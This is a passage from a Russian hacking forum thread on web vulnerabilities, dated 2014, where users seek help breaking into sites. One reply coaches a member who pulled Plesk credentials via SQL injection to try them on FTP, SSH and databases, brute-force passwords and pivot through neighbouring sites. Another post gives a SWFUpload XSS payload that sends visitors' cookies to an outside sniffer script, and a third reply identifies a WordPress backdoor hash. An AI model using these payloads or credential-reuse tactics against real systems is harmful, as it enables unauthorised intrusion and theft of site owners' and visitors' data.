HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #511  
Старый 21.01.2014, 12:18
Unknown
Guest
Сообщений: n/a
Провел на форуме:
114076

Репутация: 54
По умолчанию

Цитата:
Сообщение от ysmat  
ysmat said:
есть ли какие слабости у 1С-битрикс Управление сайтом
согласен на платный приват
Версия какая? Скриншот /bitrix/admin хотя бы.
 
Ответить с цитированием

  #512  
Старый 22.01.2014, 18:48
jassoc
Guest
Сообщений: n/a
Провел на форуме:
329

Репутация: 0
По умолчанию

Кто слышал про GomyeCMS и про её уязвимости? Нашел только одно, и та на китайском. при переводе получается ужасно.
 
Ответить с цитированием

  #513  
Старый 30.01.2014, 15:05
Unknown
Guest
Сообщений: n/a
Провел на форуме:
114076

Репутация: 54
По умолчанию

Цитата:
Сообщение от unic0rn  
unic0rn said:
Наткнулся на скулю в сайте одного хостинга, сам сайт - почти не дышит, админка в 403. Полагаю, что сайт банально переехал, так как по другому домену отзывается и вообще там все очень хорошо. Но БД старого сайта существует до сих пор и в ней есть таблица
Servers
. Колонки следующие:
ServerID, Active, DateAdded, ServerName, PleskPassword, PleskUserName, SuspendCommand, ControlPanelURL, SharedIPAddress, UnSuspendCommand, SuspendCommandResult, PrimaryDNSServerName, UnSuspendCommandResult, SecondaryDNSServerName, PrimaryDNSServerIPAddress, SecondaryDNSServerIPAddress, AlternativePrimaryDNSServerName, AlternativeSecondaryDNSServerName, AlternativePrimaryDNSServerIPAddress, AlternativeSecondaryDNSServerIPAddress
Также есть таблица
SystemUsers
с колонками:
SystemUserID, SystemUser, SysUserName, Active, ClientAccountLogin, SysPassword
Собственно, есть
url, username, password
для панели Plesk-а. Но под ними отказывается заходить, возможно поменяли все пароли.
Если у кого-то есть какие-либо соображения по этой теме - пожалуйста, не проходите мимо, спрашивайте/указывайте.
Вы все пары логин:пасс проверили? Попробуйте с ними достучаться на другие сервисы, ftp, ssh, sql, если открыты. Поищите что-нибудь вроде phpma где-нибудь рядом. В общем, ищите все, куда можно вбить логин:пасс и вбивайте. Также есть смысл залиться на сервак через соседние сайты и попробовать поднять локально через известные пароли.
 
Ответить с цитированием

  #514  
Старый 30.01.2014, 17:00
Unknown
Guest
Сообщений: n/a
Провел на форуме:
114076

Репутация: 54
По умолчанию

Цитата:
Сообщение от unic0rn  
unic0rn said:
Да, открыты ftp, ssh, но по ним тоже не подходят пароли. Заметил в БД огрызки WP, там 2 юзера, сейчас их пароли стоят на бруте.
В общем-то собрал небольшую пачку логинов/паролей (кроме тех, которые генерирует Plesk), сейчас эти добрутятся и буду ломиться везде. Дело в том, что этот сайт ссылался на ресурсы "основного" сайта, которые живы и сейчас. Дат нет, поэтому актуальность паролей сложно назвать. Еще и domain : email : psswd, которые лежат в таблице Domains, не подходят на этом самом живом сайте.
Спасибо за ответ, буду пробовать еще и через соседние ломиться.
Знакомая ситуация. Могу посоветовать немного рандомизировать пароли с помощью crunch или cupp. Даты можно косвенно выцепить из версий софта. Также иногда помогают exif-данные загруженных картинок или last-modified заголовки на некоторые страницы.
 
Ответить с цитированием

  #515  
Старый 12.02.2014, 20:00
student96
Guest
Сообщений: n/a
Провел на форуме:
275

Репутация: 0
По умолчанию

Подскажите, что означает запрос в логах сайта на wordpress :

GET /?pagehash=371425ff7acc4360c86d097ebe9eb082&cperpag e=1

где если подставить в начало запроса домен сайта и обновив открывается главная страница уже с выполненным входом в админ панель.

Так же не понятен что за хэш, не пароль же это входа в админку? Думаю, если был бы взломана база данных и был расшифрован пароль, вход бы производился с обычной страницы входа в админ панель. Спасибо
 
Ответить с цитированием

  #516  
Старый 13.02.2014, 23:15
chekist
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854

Репутация: 622
По умолчанию

Цитата:
Сообщение от student96  
student96 said:
Подскажите, что означает запрос в логах сайта на wordpress :
GET /?pagehash=371425ff7acc4360c86d097ebe9eb082&cperpag e=1
где если подставить в начало запроса домен сайта и обновив открывается главная страница уже с выполненным входом в админ панель.
Так же не понятен что за хэш, не пароль же это входа в админку? Думаю, если был бы взломана база данных и был расшифрован пароль, вход бы производился с обычной страницы входа в админ панель. Спасибо
Password: 383256

MD5(383256): 371425ff7acc4360c86d097ebe9eb082

скорее всего бекдор
 
Ответить с цитированием

  #517  
Старый 14.02.2014, 15:56
SGskam
Guest
Сообщений: n/a
Провел на форуме:
11396

Репутация: 0
По умолчанию

я слышал что в базах некоторых интернет-шопов хранится информация о карточках,

которую продают, Что она вообще из себя представляет?
 
Ответить с цитированием

  #518  
Старый 25.02.2014, 20:21
agentru
Guest
Сообщений: n/a
Провел на форуме:
2217

Репутация: 0
По умолчанию

Нашел сайт на вордпрессе, где стоит уязвимый SWFUpload.

Алерт отлично отрабатывает:

http://***.ru/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.coo kie);//

Но когда, я пытаюсь подставить вызов сниффера, скрипт не отрабатывает:

http://***.ru/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!img=new Image();img.src='http://***.ru/s.php?cookie='+document.cookie;//

Даже банальная переадресация, также не отрабатывает:

http://***.ru/wp-includes/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!location='http://www.example.ru';//

Подскажите пожалуйста, в чем может быть причина?
 
Ответить с цитированием

  #519  
Старый 26.02.2014, 21:00
SGskam
Guest
Сообщений: n/a
Провел на форуме:
11396

Репутация: 0
По умолчанию

Вообщем такая проблема захожу на сайт в админку.Там есть кнопка администрирования и меня перекидывает ***.ru/admin.php и просто пустая страница, такая же фигня есле же пишу вместо сайта его ip/phpmyadmin просто пустая формаю, может какая защита
 
Ответить с цитированием

  #520  
Старый 30.03.2014, 22:15
yarr2
Guest
Сообщений: n/a
Провел на форуме:
259

Репутация: 0
По умолчанию

Цитата:
Сообщение от student96  
student96 said:
Подскажите, что означает запрос в логах сайта на wordpress :
GET /?pagehash=371425ff7acc4360c86d097ebe9eb082&cperpag e=1
где если подставить в начало запроса домен сайта и обновив открывается главная страница уже с выполненным входом в админ панель.
Так же не понятен что за хэш, не пароль же это входа в админку? Думаю, если был бы взломана база данных и был расшифрован пароль, вход бы производился с обычной страницы входа в админ панель. Спасибо
Это троян в теме. Тут вкратце есть об этом
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Задай Вопрос - Получи Ответ] ZAMUT Уязвимости CMS / форумов 316 08.06.2010 09:56
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости. Обсуждения. 4 07.07.2006 16:53
Простой вопрос про сниффер errou PHP 15 30.01.2006 20:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ